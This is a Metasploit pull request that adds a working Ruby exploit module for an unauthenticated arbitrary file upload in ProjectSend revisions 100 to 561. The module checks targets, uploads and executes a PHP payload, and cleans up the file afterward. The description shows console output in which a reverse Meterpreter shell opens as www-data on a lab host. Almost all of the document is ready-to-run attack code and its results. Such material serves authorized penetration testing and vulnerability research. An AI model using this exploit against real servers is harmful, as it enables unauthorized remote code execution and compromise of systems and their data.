### PR TITLE
Add ProjectSend Arbitrary File Upload module

### DIFF
--- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb
+++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb
@@ -1,0 +1,164 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'ProjectSend Arbitrary File Upload',
+      'Description'    => %q{
+        This module exploits a file upload vulnerability in ProjectSend
+        revisions 100 to 561. The 'process-upload.php' file allows
+        unauthenticated users to upload PHP files resulting in remote
+        code execution as the web server user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Fady Mohammed Osman', # Discovery and Exploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['EDB', '35424']
+        ],
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00"
+        },
+      'Arch'           => ARCH_PHP,
+      'Platform'       => 'php',
+      'Targets'        =>
+        [
+          # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
+          ['ProjectSend (PHP Payload)', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Dec 02 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])
+        ], self.class)
+  end
+
+  #
+  # Checks if target upload functionality is working
+  #
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'process-upload.php')
+    )
+    if !res
+      vprint_error("#{peer} - Connection timed out")
+      return Exploit::CheckCode::Unknown
+    elsif res.code.to_i == 404
+      vprint_error("#{peer} - No process-upload.php found")
+      return Exploit::CheckCode::Safe
+    elsif res.code.to_i == 500
+      vprint_error("#{peer} - Unable to write file")
+      return Exploit::CheckCode::Safe
+    elsif res.code.to_i == 200 && res.body =~ /<\?php/
+      vprint_error("#{peer} - File process-upload.php is not executable")
+      return Exploit::CheckCode::Safe
+    elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
+      vprint_error("#{peer} - Software is misconfigured")
+      return Exploit::CheckCode::Safe
+    elsif res.code.to_i == 200 && res.body =~ /jsonrpc/
+      # response on revision 118 onwards includes the file name
+      if res.body =~ /NewFileName/
+        return Exploit::CheckCode::Vulnerable
+      # response on revisions 100 to 117 does not include the file name
+      elsif res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
+        return Exploit::CheckCode::Appears
+      elsif res.body =~ /Failed to open output stream/
+        vprint_error("#{peer} - Upload folder is not writable")
+        return Exploit::CheckCode::Safe
+      else
+        return Exploit::CheckCode::Detected
+      end
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  #
+  # Upload PHP payload
+  #
+  def upload
+    fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
+    php = "<?php #{payload.encoded} ?>"
+    data = Rex::MIME::Message.new
+    data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}"))
+    post_data = data.to_s
+    print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"),
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'data'   => post_data
+    )
+    if !res
+      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
+    elsif res.code.to_i == 404
+      fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
+    elsif res.code.to_i == 500
+      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
+    elsif res.code.to_i == 200 && res.body =~ /Failed to open output stream/
+      fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
+    elsif res.code.to_i == 200 && res.body =~ /<\?php/
+      fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
+    elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
+      fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
+    # response on revision 118 onwards includes the file name
+    elsif res.code.to_i == 200 && res.body =~ /NewFileName/
+      print_good("#{peer} - Payload uploaded successfully (#{fname})")
+      return fname
+    # response on revisions 100 to 117 does not include the file name
+    elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
+      print_warning("#{peer} - File upload may have failed")
+      return fname
+    else
+      vprint_debug("#{peer} - Received response: #{res.code} - #{res.body}")
+      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
+    end
+  end
+
+  #
+  # Execute uploaded file
+  #
+  def exec(upload_path)
+    print_status("#{peer} - Executing #{upload_path}...")
+    res = send_request_raw(
+      'uri' => normalize_uri(target_uri.path, upload_path)
+    )
+    if !res
+      print_error("#{peer} - Request timed out while executing")
+    elsif res.code.to_i == 404
+      vprint_error("#{peer} - Not found: #{upload_path}")
+    elsif res.code.to_i == 200
+      vprint_good("#{peer} - Executed #{upload_path}")
+    else
+      print_error("#{peer} - Unexpected reply")
+    end
+  end
+
+  #
+  # upload && execute
+  #
+  def exploit
+    fname = upload
+    register_files_for_cleanup(fname)
+    exec("upload/files/#{fname}") # default for r-221 onwards
+    exec("upload/temp/#{fname}")  # default for r-100 to r-219
+  end
+end


### PR DESCRIPTION
Add ProjectSend Arbitrary File Upload module
- Port of http://www.exploit-db.com/exploits/35424/
- Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
### Check

```
msf > use exploit/unix/webapp/projectsend_upload_exec
msf exploit(projectsend_upload_exec) > set RHOST 10.6.6.55
RHOST => 10.6.6.55
msf exploit(projectsend_upload_exec) > check
[*] 10.6.6.55:80 - The target is not exploitable.
msf exploit(projectsend_upload_exec) > set verbose true
verbose => true
msf exploit(projectsend_upload_exec) > set targeturi /ProjectSend-r561/ 
targeturi => /ProjectSend-r561/
msf exploit(projectsend_upload_exec) > check
[+] 10.6.6.55:80 - The target is vulnerable.
```
### Run

```
msf exploit(projectsend_upload_exec) > run

[*] Started reverse handler on 10.6.6.66:4444 
[*] 10.6.6.55:80 - Uploading file 'YA577D9ea8L44gf.php' (1796 bytes)
[+] 10.6.6.55:80 - Payload uploaded successfully (YA577D9ea8L44gf.php)
[*] 10.6.6.55:80 - Executing upload/files/YA577D9ea8L44gf.php...
[*] Sending stage (40551 bytes) to 10.6.6.55
[*] Meterpreter session 1 opened (10.6.6.66:4444 -> 10.6.6.55:58917) at 2014-12-20 13:25:45 -0500
[+] Deleted YA577D9ea8L44gf.php
^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
```
